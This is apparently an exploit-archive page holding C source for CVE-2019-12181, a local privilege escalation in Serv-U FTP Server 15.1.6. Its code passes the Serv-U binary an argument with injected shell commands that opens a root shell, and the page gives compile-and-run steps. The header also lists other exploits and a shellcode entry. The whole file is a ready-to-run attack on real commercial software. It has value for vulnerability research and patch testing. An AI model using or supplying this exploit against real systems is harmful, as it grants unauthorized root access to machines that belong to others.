745971e212
5 changes to exploits/shellcodes Serv-U FTP Server < 15.1.7 - Local Privilege Escalation Sahi pro 7.x/8.x - Directory Traversal Sahi pro 8.x - SQL Injection Sahi pro 8.x - Cross-Site Scripting Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)
24 lines
No EOL
619 B
C
24 lines
No EOL
619 B
C
/*
|
|
|
|
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation
|
|
|
|
vulnerability found by:
|
|
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
|
|
|
|
to compile and run:
|
|
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
|
|
int main()
|
|
{
|
|
char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
|
|
int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
|
|
// if execv is successful, we won't reach here
|
|
printf("ret val: %d errno: %d\n", ret_val, errno);
|
|
return errno;
|
|
} |